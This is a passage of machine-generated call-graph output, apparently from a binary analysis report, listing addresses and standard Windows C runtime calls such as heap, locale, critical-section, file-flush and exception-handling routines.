7fef74f48be 16506->16505 18398 7fef7511200 18399 7fef74fed30 _FindAndUnlinkFrame 36 API calls 18398->18399 18400 7fef7511212 _IsExceptionObjectToBeDestroyed __SehTransFilter 18399->18400 18407 7fef7506203 18408 7fef750616e _CrtMemDumpAllObjectsSince wcsxfrm 18407->18408 18409 7fef7506238 MultiByteToWideChar 18408->18409 18410 7fef75061c8 _LocaleUpdate::~_LocaleUpdate 18408->18410 18409->18410 18411 7fef7510204 18412 7fef751023d 18411->18412 18413 7fef7510326 18412->18413 18414 7fef751028d 18412->18414 18415 7fef750ab10 17 API calls 18412->18415 18413->18414 18416 7fef7509290 23 API calls 18413->18416 18415->18413 18416->18414 17109 7fef74f3409 17110 7fef74f3e00 3 API calls 17109->17110 17111 7fef74f340e 17110->17111 17114 7fef74f88d0 HeapDestroy 17111->17114 17113 7fef74f3413 17114->17113 18728 7fef74f3909 18729 7fef74f3913 __SehTransFilter 18728->18729 18730 7fef74f39db __SehTransFilter 18729->18730 18731 7fef74f3a71 RtlUnwindEx 18729->18731 18731->18730 17740 7fef750c30d 17741 7fef750c31a get_int64_arg _get_printf_count_output 17740->17741 17742 7fef750c39d 17741->17742 17753 7fef750c3f2 17741->17753 17743 7fef74fbd70 _invalid_parameter 17 API calls 17742->17743 17744 7fef750bb0e _LocaleUpdate::~_LocaleUpdate 17743->17744 17745 7fef74f3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17744->17745 17748 7fef750cd90 17745->17748 17746 7fef750b99c 17747 7fef750cc93 17746->17747 17751 7fef750bada 17746->17751 17747->17744 17749 7fef74fbd70 _invalid_parameter 17 API calls 17747->17749 17749->17744 17750 7fef750b530 wctomb_s 19 API calls 17750->17753 17752 7fef74fbd70 _invalid_parameter 17 API calls 17751->17752 17752->17744 17753->17746 17753->17750 16237 7fef74f3d30 16255 7fef74f7540 16237->16255 16242 7fef74f3d4e FlsAlloc 16245 7fef74f3d73 _calloc_dbg 16242->16245 16246 7fef74f3d6a 16242->16246 16243 7fef74f3d42 16264 7fef74f3e00 16243->16264 16249 7fef74f3da4 FlsSetValue 16245->16249 16250 7fef74f3db9 16245->16250 16248 7fef74f3e00 3 API calls 16246->16248 16247 7fef74f3d47 16248->16247 16249->16250 16251 7fef74f3dc2 16249->16251 16252 7fef74f3e00 3 API calls 16250->16252 16269 7fef74f3e30 16251->16269 16252->16247 16275 7fef74f3d00 RtlEncodePointer 16255->16275 16257 7fef74f7549 _initp_misc_winsig 16276 7fef74fcf20 EncodePointer 16257->16276 16259 7fef74f3d39 16260 7fef74f8fe0 16259->16260 16262 7fef74f8ff6 16260->16262 16261 7fef74f9022 InitializeCriticalSectionAndSpinCount 16261->16262 16263 7fef74f3d3e 16261->16263 16262->16261 16262->16263 16263->16242 16263->16243 16265 7fef74f3e23 16264->16265 16266 7fef74f3e0d FlsFree 16264->16266 16277 7fef74f90b0 16265->16277 16266->16265 16270 7fef74f3ead 16269->16270 16283 7fef74f9360 LeaveCriticalSection 16270->16283 16272 7fef74f3ec7 _updatetlocinfoEx_nolock 16284 7fef74f9360 LeaveCriticalSection 16272->16284 16274 7fef74f3dce GetCurrentThreadId 16274->16247 16275->16257 16276->16259 16280 7fef74f90be 16277->16280 16278 7fef74f90fd DeleteCriticalSection 16278->16280 16279 7fef74f3e28 16279->16247 16280->16278 16281 7fef74f914d 16280->16281 16281->16279 16282 7fef74f9196 DeleteCriticalSection 16281->16282 16282->16281 16283->16272 16284->16274 17115 7fef74fe830 17116 7fef74fe857 17115->17116 17119 7fef7503cc0 17116->17119 17120 7fef7503cdd 17119->17120 17121 7fef7503d82 17120->17121 17122 7fef7503ef3 __SehTransFilter 17120->17122 17131 7fef74fe8e3 17120->17131 17124 7fef7503dc8 17121->17124 17125 7fef7503e40 17121->17125 17121->17131 17122->17131 17157 7fef75040b0 17122->17157 17137 7fef7503a60 17124->17137 17126 7fef7503ebd 17125->17126 17130 7fef74fcf80 _inconsistency 36 API calls 17125->17130 17132 7fef7503e93 17125->17132 17126->17131 17150 7fef74fe790 17126->17150 17130->17132 17135 7fef7504f20 __SehTransFilter 36 API calls 17132->17135 17133 7fef7503e08 17143 7fef7504f20 17133->17143 17134 7fef74fcf80 _inconsistency 36 API calls 17134->17133 17135->17126 17138 7fef7503a7b 17137->17138 17139 7fef7503a7d 17137->17139 17141 7fef74fcf80 _inconsistency 36 API calls 17138->17141 17142 7fef7503aa5 17138->17142 17140 7fef74fcf80 _inconsistency 36 API calls 17139->17140 17140->17138 17141->17142 17142->17133 17142->17134 17202 7fef7503b70 17143->17202 17145 7fef74fcf80 _inconsistency 36 API calls 17149 7fef7504f55 __SehTransFilter _SetImageBase __SetState 17145->17149 17146 7fef7505103 17147 7fef750514a __SetState 17146->17147 17148 7fef74fcf80 _inconsistency 36 API calls 17146->17148 17147->17131 17148->17147 17149->17145 17149->17146 17209 7fef74fe500 17150->17209 17153 7fef7503b40 __StateFromControlPc 36 API calls 17154 7fef74fe7d0 __SehTransFilter 17153->17154 17155 7fef7504f20 __SehTransFilter 36 API calls 17154->17155 17156 7fef74fe81e 17155->17156 17156->17131 17158 7fef7503b40 __StateFromControlPc 36 API calls 17157->17158 17159 7fef75040ea 17158->17159 17160 7fef74fe500 __SetUnwindTryBlock 37 API calls 17159->17160 17161 7fef7504110 17160->17161 17214 7fef7503c70 17161->17214 17164 7fef7504133 __SetState 17217 7fef7503c00 17164->17217 17165 7fef7504176 17166 7fef7503c70 __GetUnwindTryBlock 37 API calls 17165->17166 17167 7fef7504174 17166->17167 17169 7fef74fcf80 _inconsistency 36 API calls 17167->17169 17170 7fef75041af _ValidateRead _SetThrowImageBase 17167->17170 17169->17170 17172 7fef7504347 17170->17172 17178 7fef7504235 17170->17178 17186 7fef74fcf80 _inconsistency 36 API calls 17170->17186 17189 7fef750428e 17170->17189 17171 7fef75047d9 17173 7fef75047f3 17171->17173 17174 7fef7504847 17171->17174 17179 7fef75047d7 17171->17179 17172->17171 17175 7fef75043f5 17172->17175 17247 7fef7504960 17173->17247 17177 7fef74fcf50 terminate 35 API calls 17174->17177 17182 7fef750466c __SehTransFilter 17175->17182 17232 7fef74fea30 17175->17232 17177->17179 17178->17131 17179->17178 17181 7fef74fcf80 _inconsistency 36 API calls 17179->17181 17181->17178 17182->17179 17183 7fef7505bb0 __SehTransFilter 36 API calls 17182->17183 17184 7fef7504727 17183->17184 17184->17179 17185 7fef74fe500 __SetUnwindTryBlock 37 API calls 17184->17185 17187 7fef7504767 17185->17187 17186->17189 17244 7fef74fedc0 RtlUnwindEx 17187->17244 17190 7fef74fcf80 _inconsistency 36 API calls 17189->17190 17191 7fef75042fa 17189->17191 17190->17191 17191->17172 17220 7fef7505bb0 17191->17220 17192 7fef7504450 __SehTransFilter 17192->17182 17237 7fef7505180 17192->17237 17195 7fef7504340 __SehTransFilter 17195->17172 17196 7fef7504393 17195->17196 17197 7fef750435a __SehTransFilter 17195->17197 17198 7fef74fcf50 terminate 35 API calls 17196->17198 17226 7fef7504870 17197->17226 17198->17172 17203 7fef7503b9a 17202->17203 17204 7fef7503ba9 17202->17204 17206 7fef7503b40 17203->17206 17204->17149 17207 7fef7503a60 __StateFromControlPc 36 API calls 17206->17207 17208 7fef7503b65 17207->17208 17208->17204 17210 7fef7503b40 __StateFromControlPc 36 API calls 17209->17210 17211 7fef74fe539 17210->17211 17212 7fef74fe5c2 RtlLookupFunctionEntry 17211->17212 17213 7fef74fe601 17211->17213 17212->17213 17213->17153 17215 7fef74fe500 __SetUnwindTryBlock 37 API calls 17214->17215 17216 7fef7503c9c 17215->17216 17216->17164 17216->17165 17218 7fef74fe500 __SetUnwindTryBlock 37 API calls 17217->17218 17219 7fef7503c31 17218->17219 17219->17167 17221 7fef7505bc6 17220->17221 17222 7fef7505bc8 17220->17222 17224 7fef74fcf50 terminate 35 API calls 17221->17224 17225 7fef7505bda __SehTransFilter 17221->17225 17223 7fef74fcf80 _inconsistency 36 API calls 17222->17223 17223->17221 17224->17225 17225->17195 17257 7fef750d4e0 17226->17257 17229 7fef750d320 17231 7fef750d375 17229->17231 17230 7fef750d3ba RaiseException 17230->17172 17231->17230 17233 7fef7503b40 __StateFromControlPc 36 API calls 17232->17233 17234 7fef74fea6f 17233->17234 17235 7fef74fcf80 _inconsistency 36 API calls 17234->17235 17236 7fef74fea7a 17234->17236 17235->17236 17236->17192 17238 7fef74fe500 __SetUnwindTryBlock 37 API calls 17237->17238 17239 7fef75051c1 17238->17239 17240 7fef75051f0 __SehTransFilter 17239->17240 17264 7fef7505970 17239->17264 17242 7fef74fedc0 __SehTransFilter 9 API calls 17240->17242 17243 7fef7505259 17242->17243 17243->17192 17245 7fef74f3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17244->17245 17246 7fef74feee7 17245->17246 17246->17179 17249 7fef7504990 17247->17249 17254 7fef750498b 17247->17254 17248 7fef75049b2 __SehTransFilter 17250 7fef7504a41 17248->17250 17251 7fef74fcf80 _inconsistency 36 API calls 17248->17251 17248->17254 17249->17248 17281 7fef74f3d00 RtlEncodePointer 17249->17281 17252 7fef74fea30 __SehTransFilter 36 API calls 17250->17252 17251->17250 17255 7fef7504a8e __SehTransFilter 17252->17255 17254->17179 17255->17254 17256 7fef7505180 __SehTransFilter 38 API calls 17255->17256 17256->17254 17260 7fef750d660 17257->17260 17261 7fef750d676 std::exception::_Copy_str malloc 17260->17261 17263 7fef750437d 17260->17263 17262 7fef74fd490 std::exception::_Copy_str 17 API calls 17261->17262 17261->17263 17262->17263 17263->17229 17265 7fef7505998 17264->17265 17268 7fef75055f0 17265->17268 17267 7fef75059d3 __SehTransFilter __AdjustPointer 17267->17240 17269 7fef750561e __SehTransFilter 17268->17269 17270 7fef7505765 17269->17270 17271 7fef75056fa _ValidateRead 17269->17271 17279 7fef75056aa __SehTransFilter __AdjustPointer 17269->17279 17272 7fef750577a _ValidateRead 17270->17272 17273 7fef7505813 __SehTransFilter 17270->17273 17274 7fef74fcf80 _inconsistency 36 API calls 17271->17274 17271->17279 17275 7fef74fcf80 _inconsistency 36 API calls 17272->17275 17272->17279 17276 7fef750584d _ValidateRead 17273->17276 17280 7fef75058c6 __SehTransFilter _ValidateExecute _ValidateRead 17273->17280 17274->17279 17275->17279 17277 7fef74fcf80 _inconsistency 36 API calls 17276->17277 17276->17279 17277->17279 17278 7fef74fcf80 _inconsistency 36 API calls 17278->17279 17279->17267 17280->17278 17280->17279 17281->17248 18732 7fef74f3130 18733 7fef74f3170 __GSHandlerCheck 8 API calls 18732->18733 18734 7fef74f3160 18733->18734 17282 7fef750d830 17283 7fef750d8aa 17282->17283 17284 7fef750d926 17283->17284 17286 7fef750d97b 17283->17286 17285 7fef74fbd70 _invalid_parameter 17 API calls 17284->17285 17289 7fef750d95a _LocaleUpdate::~_LocaleUpdate 17285->17289 17287 7fef750d9ee 17286->17287 17293 7fef750da43 17286->17293 17288 7fef74fbd70 _invalid_parameter 17 API calls 17287->17288 17288->17289 17290 7fef74f3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17289->17290 17291 7fef750ed9e 17290->17291 17292 7fef750eca1 17292->17289 17294 7fef74fbd70 _invalid_parameter 17 API calls 17292->17294 17293->17292 17295 7fef750dbb5 17293->17295 17294->17289 17296 7fef74fbd70 _invalid_parameter 17 API calls 17295->17296 17296->17289 17297 7fef74f6c32 17298 7fef74f6c3c 17297->17298 17299 7fef74f6c7a _CrtMemDumpAllObjectsSince 17298->17299 17300 7fef74f6e25 _LocaleUpdate::~_LocaleUpdate 17298->17300 17303 7fef74fc260 _CrtMemDumpAllObjectsSince_stat 3 API calls 17299->17303 17304 7fef74f6ce0 _CrtMemDumpAllObjectsSince _CrtMemDumpAllObjectsSince_stat 17299->17304 17301 7fef74f3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17300->17301 17302 7fef74f6e89 17301->17302 17303->17304 17305 7fef74fc0c0 _swprintf_p 17 API calls 17304->17305 17307 7fef74f6dc7 17305->17307 17306 7fef74f6e12 17307->17306 17308 7fef74f6ea0 _invoke_watson_if_oneof 16 API calls 17307->17308 17308->17306 16473 7fef74f3433 16474 7fef74f3437 16473->16474 16475 7fef74f3446 16473->16475 16476 7fef74f7d00 _ioterm DeleteCriticalSection 16474->16476 16477 7fef74f343c 16476->16477 16478 7fef74f3e00 3 API calls 16477->16478 16479 7fef74f3441 16478->16479 16481 7fef74f88d0 HeapDestroy 16479->16481 16481->16475 17309 7fef750c435 17310 7fef750c479 _CrtMemDumpAllObjectsSince 17309->17310 17311 7fef750c598 DecodePointer 17310->17311 17312 7fef750c60d _CrtMemDumpAllObjectsSince 17311->17312 17313 7fef750c652 _CrtMemDumpAllObjectsSince 17312->17313 17314 7fef750c62b DecodePointer 17312->17314 17315 7fef750c676 DecodePointer 17313->17315 17325 7fef750c69d std::exception::_Copy_str 17313->17325 17314->17313 17315->17325 17316 7fef750b99c 17317 7fef750cc93 17316->17317 17321 7fef750bada 17316->17321 17318 7fef74fbd70 _invalid_parameter 17 API calls 17317->17318 17320 7fef750bb0e _LocaleUpdate::~_LocaleUpdate 17317->17320 17318->17320 17319 7fef750b530 wctomb_s 19 API calls 17319->17325 17322 7fef74f3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17320->17322 17324 7fef74fbd70 _invalid_parameter 17 API calls 17321->17324 17323 7fef750cd90 17322->17323 17324->17320 17325->17316 17325->17319 18744 7fef7509939 18745 7fef7509951 __doserrno 18744->18745 18746 7fef74fbd70 _invalid_parameter 17 API calls 18745->18746 18747 7fef75099d7 18746->18747 18748 7fef74f3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18747->18748 18749 7fef750a9f5 18748->18749 18426 7fef7503e3b 18427 7fef7503ec7 18426->18427 18428 7fef74fe790 __SehTransFilter 37 API calls 18427->18428 18429 7fef7503ee4 18428->18429 17326 7fef74f443c 17327 7fef74f444c 17326->17327 17330 7fef74f9360 LeaveCriticalSection 17327->17330 17329 7fef74f48be 17330->17329 18761 7fef7504920 18764 7fef750d530 18761->18764 18767 7fef750d580 18764->18767 18768 7fef750d59a std::exception::_Tidy 18767->18768 18769 7fef750493d 18767->18769 18768->18769 18770 7fef750d660 std::exception::_Copy_str 17 API calls 18768->18770 18770->18769 17331 7fef750e424 17332 7fef750e469 _CrtMemDumpAllObjectsSince 17331->17332 17333 7fef750e588 DecodePointer 17332->17333 17334 7fef750e5fd _CrtMemDumpAllObjectsSince 17333->17334 17335 7fef750e61b DecodePointer 17334->17335 17336 7fef750e642 _CrtMemDumpAllObjectsSince 17334->17336 17335->17336 17337 7fef750e666 DecodePointer 17336->17337 17339 7fef750e68d std::exception::_Copy_str 17336->17339 17337->17339 17338 7fef750eadf 17341 7fef750ef10 25 API calls 17338->17341 17339->17338 17340 7fef750eec0 25 API calls 17339->17340 17348 7fef750da75 17339->17348 17340->17338 17342 7fef750eafd 17341->17342 17343 7fef750eb33 17342->17343 17346 7fef750eec0 25 API calls 17342->17346 17344 7fef750ec29 17343->17344 17358 7fef750eb49 _CrtMemDumpAllObjectsSince 17343->17358 17345 7fef750ef10 25 API calls 17344->17345 17347 7fef750ebda 17345->17347 17346->17343 17347->17348 17352 7fef750eec0 25 API calls 17347->17352 17349 7fef750eca1 17348->17349 17351 7fef750dbb5 17348->17351 17350 7fef74fbd70 _invalid_parameter 17 API calls 17349->17350 17353 7fef750dbe9 _LocaleUpdate::~_LocaleUpdate 17349->17353 17350->17353 17356 7fef74fbd70 _invalid_parameter 17 API calls 17351->17356 17352->17348 17354 7fef74f3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17353->17354 17355 7fef750ed9e 17354->17355 17356->17353 17357 7fef750f000 wcsxfrm 2 API calls 17357->17358 17358->17347 17358->17357 17359 7fef750ee40 25 API calls 17358->17359 17359->17358 18430 7fef74f5a25 18431 7fef74f5a37 18430->18431 18432 7fef74fbd70 _invalid_parameter 17 API calls 18431->18432 18433 7fef74f5aaf 18432->18433 17785 7fef74f9328 17786 7fef74f9336 EnterCriticalSection 17785->17786 17787 7fef74f932c 17785->17787 17787->17786 18775 7fef74fb12b 18776 7fef74fb14c 18775->18776 18778 7fef74fb2e0 18776->18778 18779 7fef74f6ea0 _invoke_watson_if_oneof 16 API calls 18776->18779 18777 7fef74fb33e 18781 7fef7500cc0 25 API calls 18777->18781 18778->18777 18780 7fef74fd490 std::exception::_Copy_str 17 API calls 18778->18780 18779->18778 18782 7fef74fb311 18780->18782 18783 7fef74fb358 18781->18783 18784 7fef74f7ff0 _invoke_watson_if_error 16 API calls 18782->18784 18785 7fef74fb37d 18783->18785 18786 7fef74fcff0 terminate 34 API calls 18783->18786 18784->18777 18788 7fef74f3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18785->18788 18787 7fef74fb373 18786->18787 18789 7fef74f7090 _exit 33 API calls 18787->18789 18790 7fef74fb3a0 18788->18790 18789->18785 17788 7fef750ff2d 17789 7fef750ff37 17788->17789 17790 7fef7510042 17789->17790 17791 7fef750ff47 17789->17791 17816 7fef74f9360 LeaveCriticalSection 17790->17816 17792 7fef751003d 17791->17792 17803 7fef750ae90 17791->17803 17794 7fef751004c 17796 7fef750ff97 17798 7fef750ffe1 17796->17798 17799 7fef750ffbb 17796->17799 17801 7fef750ffd0 17796->17801 17797 7fef750af60 _unlock_file2 2 API calls 17797->17792 17798->17801 17802 7fef750fd70 _fflush_nolock 25 API calls 17798->17802 17806 7fef750fd70 17799->17806 17801->17797 17802->17801 17804 7fef750aec8 EnterCriticalSection 17803->17804 17805 7fef750aea4 17803->17805 17804->17805 17805->17796 17807 7fef750fd81 17806->17807 17808 7fef750fd8a 17806->17808 17817 7fef750ff00 17807->17817 17832 7fef750fdf0 17808->17832 17811 7fef750fd94 17812 7fef750afb0 _fflush_nolock 17 API calls 17811->17812 17815 7fef750fd88 17811->17815 17813 7fef750fdba 17812->17813 17836 7fef75107c0 17813->17836 17815->17801 17816->17794 17818 7fef750ff22 17817->17818 17819 7fef7510042 17818->17819 17820 7fef750ff47 17818->17820 17852 7fef74f9360 LeaveCriticalSection 17819->17852 17821 7fef751003d 17820->17821 17824 7fef750ae90 _lock_file2 EnterCriticalSection 17820->17824 17821->17815 17823 7fef751004c 17823->17815 17825 7fef750ff97 17824->17825 17827 7fef750ffbb 17825->17827 17829 7fef750ffe1 17825->17829 17831 7fef750ffd0 17825->17831 17826 7fef750af60 _unlock_file2 2 API calls 17826->17821 17828 7fef750fd70 _fflush_nolock 25 API calls 17827->17828 17828->17831 17830 7fef750fd70 _fflush_nolock 25 API calls 17829->17830 17829->17831 17830->17831 17831->17826 17833 7fef750fe1f 17832->17833 17835 7fef750fe5d 17832->17835 17834 7fef750afb0 _fflush_nolock 17 API calls 17833->17834 17833->17835 17834->17835 17835->17811 17837 7fef75107e8 17836->17837 17838 7fef75107d3 17836->17838 17839 7fef7510851 17837->17839 17844 7fef751088f 17837->17844 17838->17815 17840 7fef74fbd70 _invalid_parameter 17 API calls 17839->17840 17840->17838 17841 7fef7510951 17843 7fef750fae0 _fflush_nolock 3 API calls 17841->17843 17842 7fef7510913 17846 7fef74fbd70 _invalid_parameter 17 API calls 17842->17846 17845 7fef751095a 17843->17845 17844->17841 17844->17842 17847 7fef750f900 _fflush_nolock 17 API calls 17845->17847 17851 7fef75109ab __doserrno 17845->17851 17846->17838 17848 7fef7510992 FlushFileBuffers 17847->17848 17849 7fef751099f GetLastError 17848->17849 17848->17851 17849->17851 17853 7fef750fbc0 LeaveCriticalSection 17851->17853 17852->17823 17853->17838 18791 7fef74f34d5 18792 7fef74f34da _calloc_dbg 18791->18792 18793 7fef74f350b FlsSetValue 18792->18793 18797 7fef74f3548 18792->18797 18794 7fef74f3520 18793->18794 18793->18797 18795 7fef74f3e30 LeaveCriticalSection 18794->18795 18796 7fef74f352c GetCurrentThreadId 18795->18796 18796->18797 17360 7fef74f33d6 17363 7fef74f88d0 HeapDestroy 17360->17363 17362 7fef74f33db 17363->17362 17865 7fef74f5ad9 17866 7fef74f5add 17865->17866 17867 7fef74f6380 _CrtIsValidHeapPointer HeapValidate 17866->17867 17868 7fef74f5b3a 17867->17868 17871 7fef74f9360 LeaveCriticalSection 17868->17871 17870 7fef74f5c14 17871->17870 17872 7fef74f66da 17873 7fef74f6725 17872->17873 17874 7fef74f6745 17872->17874 17873->17874 17878 7fef74f9a70 17873->17878 17875 7fef74f677f 17874->17875 17877 7fef74f9b10 __updatetmbcinfo LeaveCriticalSection 17874->17877 17877->17875 17880 7fef74f9a79 _updatetlocinfoEx_nolock 17878->17880 17879 7fef74f9ad8 17879->17874 17880->17879 17882 7fef74f9360 LeaveCriticalSection 17880->17882 17882->17879 17887 7fef75076c0 17888 7fef7507be3 _CrtMemDumpAllObjectsSince 17887->17888 17889 7fef75076cf _CrtMemDumpAllObjectsSince 17887->17889 17890 7fef7507cc6 WideCharToMultiByte 17888->17890 17901 7fef75076e6 _LocaleUpdate::~_LocaleUpdate 17888->17901 17891 7fef7507905 _CrtMemDumpAllObjectsSince 17889->17891 17892 7fef75077f5 _CrtMemDumpAllObjectsSince wcsncnt 17889->17892 17889->17901 17890->17901 17893 7fef750790f WideCharToMultiByte 17891->17893 17896 7fef7507827 WideCharToMultiByte 17892->17896 17897 7fef7507965 17893->17897 17894 7fef74f3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17895 7fef7507d85 17894->17895 17896->17901 17898 7fef750799a GetLastError 17897->17898 17897->17901 17900 7fef75079d3 _CrtMemDumpAllObjectsSince 17898->17900 17898->17901 17899 7fef7507a05 WideCharToMultiByte 17899->17900 17899->17901 17900->17899 17900->17901 17901->17894 18798 7fef74f68c4 18799 7fef74f68d1 18798->18799 18800 7fef74f6ba6 18799->18800 18803 7fef74f68ed _CrtIsValidPointer 18799->18803 18816 7fef74f9360 LeaveCriticalSection 18800->18816 18802 7fef74f6bb0 18804 7fef74f695e IsBadReadPtr 18803->18804 18805 7fef74f6976 18803->18805 18814 7fef74f692f 18803->18814 18804->18805 18806 7fef74f6ad2 18805->18806 18807 7fef74f6a29 18805->18807 18808 7fef74f6add 18806->18808 18811 7fef74f6b2d 18806->18811 18809 7fef74f6abe 18807->18809 18810 7fef74f6a86 IsBadReadPtr 18807->18810 18813 7fef74f6bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 18808->18813 18812 7fef74f6bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 18809->18812 18810->18809 18810->18814 18811->18814 18815 7fef74f6bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 18811->18815 18812->18814 18813->18814 18815->18814 18816->18802 17376 7fef74ff7f1 17377 7fef74ff80d 17376->17377 17396 7fef74ff8de _wcsftime_l 17376->17396 17433 7fef7506fb0 17377->17433 17379 7fef74ffa70 17440 7fef75069c0 17379->17440 17381 7fef74f7ff0 _invoke_watson_if_error 16 API calls 17384 7fef74ff85a OutputDebugStringA 17381->17384 17383 7fef74ff9f4 17383->17379 17386 7fef74fd490 std::exception::_Copy_str 17 API calls 17383->17386 17387 7fef74ff872 OutputDebugStringA OutputDebugStringA OutputDebugStringA OutputDebugStringA 17384->17387 17385 7fef74ffa8a 17388 7fef74f7ff0 _invoke_watson_if_error 16 API calls 17385->17388 17389 7fef74ffa43 17386->17389 17432 7fef74ff8ce 17387->17432 17391 7fef74ffab7 17388->17391 17392 7fef74f7ff0 _invoke_watson_if_error 16 API calls 17389->17392 17393 7fef74ffb24 17391->17393 17394 7fef75069c0 17 API calls 17391->17394 17408 7fef74ffb6a 17391->17408 17392->17379 17395 7fef75069c0 17 API calls 17393->17395 17397 7fef74ffaf7 17394->17397 17398 7fef74ffb3d 17395->17398 17396->17383 17402 7fef74f6ea0 _invoke_watson_if_oneof 16 API calls 17396->17402 17403 7fef74ff996 17396->17403 17399 7fef74f7ff0 _invoke_watson_if_error 16 API calls 17397->17399 17400 7fef74f7ff0 _invoke_watson_if_error 16 API calls 17398->17400 17399->17393 17400->17408 17401 7fef74f3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17405 7fef750011d 17401->17405 17402->17403 17403->17383 17404 7fef74fd490 std::exception::_Copy_str 17 API calls 17403->17404 17406 7fef74ff9c7 17404->17406 17407 7fef74f7ff0 _invoke_watson_if_error 16 API calls 17406->17407 17407->17383 17409 7fef74f6ea0 _invoke_watson_if_oneof 16 API calls 17408->17409 17410 7fef74ffc39 17408->17410 17409->17410 17411 7fef74ffc97 17410->17411 17412 7fef74fd490 std::exception::_Copy_str 17 API calls 17410->17412 17453 7fef7506970 17411->17453 17413 7fef74ffc6a 17412->17413 17415 7fef74f7ff0 _invoke_watson_if_error 16 API calls 17413->17415 17415->17411 17417 7fef74f6ea0 _invoke_watson_if_oneof 16 API calls 17418 7fef74ffd6e 17417->17418 17419 7fef7501640 17 API calls 17418->17419 17428 7fef74ffdbb 17418->17428 17420 7fef74ffd8e 17419->17420 17421 7fef74f7ff0 _invoke_watson_if_error 16 API calls 17420->17421 17421->17428 17422 7fef74fffef 17423 7fef7500016 17422->17423 17424 7fef7500008 OutputDebugStringA 17422->17424 17429 7fef7506fb0 _itow_s 17 API calls 17423->17429 17423->17432 17424->17423 17426 7fef74fff03 std::exception::_Copy_str 17426->17422 17427 7fef74fffaa WriteFile 17426->17427 17426->17432 17427->17422 17428->17426 17456 7fef74f9360 LeaveCriticalSection 17428->17456 17430 7fef7500065 17429->17430 17431 7fef74f7ff0 _invoke_watson_if_error 16 API calls 17430->17431 17431->17432 17432->17401 17434 7fef7507003 17433->17434 17435 7fef7506fd6 17433->17435 17437 7fef7507030 _itow_s 17 API calls 17434->17437 17435->17434 17436 7fef7506fdd 17435->17436 17457 7fef7507030 17436->17457 17439 7fef74ff82d 17437->17439 17439->17381 17441 7fef75069e1 17440->17441 17442 7fef7506a42 17441->17442 17444 7fef7506a80 _calloc_dbg_impl 17441->17444 17443 7fef74fbd70 _invalid_parameter 17 API calls 17442->17443 17446 7fef7506a76 _calloc_dbg_impl 17443->17446 17445 7fef7506b6e 17444->17445 17447 7fef7506bac _calloc_dbg_impl 17444->17447 17449 7fef74fbd70 _invalid_parameter 17 API calls 17445->17449 17446->17385 17448 7fef7506d26 _calloc_dbg_impl 17447->17448 17450 7fef7506ce8 17447->17450 17448->17446 17452 7fef74fbd70 _invalid_parameter 17 API calls 17448->17452 17449->17446 17451 7fef74fbd70 _invalid_parameter 17 API calls 17450->17451 17451->17446 17452->17446 17473 7fef75063e0 17453->17473 17455 7fef74ffd20 17455->17417 17456->17426 17458 7fef7507055 17457->17458 17459 7fef75070ab 17458->17459 17461 7fef75070e9 17458->17461 17460 7fef74fbd70 _invalid_parameter 17 API calls 17459->17460 17470 7fef75070df 17460->17470 17462 7fef750714a 17461->17462 17464 7fef7507188 _calloc_dbg_impl 17461->17464 17463 7fef74fbd70 _invalid_parameter 17 API calls 17462->17463 17463->17470 17465 7fef7507287 17464->17465 17467 7fef75072c5 17464->17467 17466 7fef74fbd70 _invalid_parameter 17 API calls 17465->17466 17466->17470 17468 7fef7507338 17467->17468 17471 7fef7507376 17467->17471 17469 7fef74fbd70 _invalid_parameter 17 API calls 17468->17469 17469->17470 17470->17439 17471->17470 17472 7fef74fbd70 _invalid_parameter 17 API calls 17471->17472 17472->17470 17474 7fef750640e 17473->17474 17475 7fef750648e 17474->17475 17477 7fef75064cc _calloc_dbg_impl 17474->17477 17476 7fef74fbd70 _invalid_parameter 17 API calls 17475->17476 17484 7fef75064c2 _calloc_dbg_impl _LocaleUpdate::~_LocaleUpdate 17476->17484 17478 7fef750663f 17477->17478 17479 7fef750668e _CrtMemDumpAllObjectsSince 17477->17479 17480 7fef74fbd70 _invalid_parameter 17 API calls 17478->17480 17485 7fef7505ea0 17479->17485 17480->17484 17482 7fef75066b5 _calloc_dbg_impl 17483 7fef74fbd70 _invalid_parameter 17 API calls 17482->17483 17482->17484 17483->17484 17484->17455 17486 7fef7505ecf 17485->17486 17487 7fef7505fae 17486->17487 17488 7fef7505f6e 17486->17488 17497 7fef7505eda std::exception::_Copy_str _LocaleUpdate::~_LocaleUpdate 17486->17497 17490 7fef7505fcf _CrtMemDumpAllObjectsSince 17487->17490 17491 7fef75062e1 _CrtMemDumpAllObjectsSince 17487->17491 17489 7fef74fbd70 _invalid_parameter 17 API calls 17488->17489 17489->17497 17492 7fef75060a1 MultiByteToWideChar 17490->17492 17490->17497 17493 7fef750632f MultiByteToWideChar 17491->17493 17491->17497 17494 7fef750610e GetLastError 17492->17494 17492->17497 17493->17497 17496 7fef7506154 _CrtMemDumpAllObjectsSince wcsxfrm 17494->17496 17494->17497 17495 7fef7506238 MultiByteToWideChar 17495->17497 17496->17495 17496->17497 17497->17482 16465 7fef74f6ff2 16466 7fef74f6ffe 16465->16466 16469 7fef74fca00 16466->16469 16468 7fef74f7011 _initterm_e 16472 7fef74fca0e 16469->16472 16470 7fef74fca23 EncodePointer 16470->16472 16471 7fef74fca4b 16471->16468 16472->16470 16472->16471 17498 7fef74f53fb 17499 7fef74f541d _realloc_dbg 17498->17499 17501 7fef74f5421 17499->17501 17504 7fef74f6380 17499->17504 17502 7fef74f54de _calloc_dbg_impl _realloc_dbg 17508 7fef74fc020 17502->17508 17505 7fef74f6391 17504->17505 17506 7fef74f6395 _CrtIsValidPointer 17504->17506 17505->17502 17506->17505 17507 7fef74f63b6 HeapValidate 17506->17507 17507->17505 17509 7fef74fc039 _get_errno_from_oserr 17508->17509 17510 7fef74fc03b HeapFree 17508->17510 17509->17501 17510->17509 17511 7fef74fc05a GetLastError 17510->17511 17511->17509 17951 7fef750e2fc 17952 7fef750e309 get_int64_arg _get_printf_count_output 17951->17952 17953 7fef750e38c 17952->17953 17954 7fef750e3e1 17952->17954 17956 7fef74fbd70 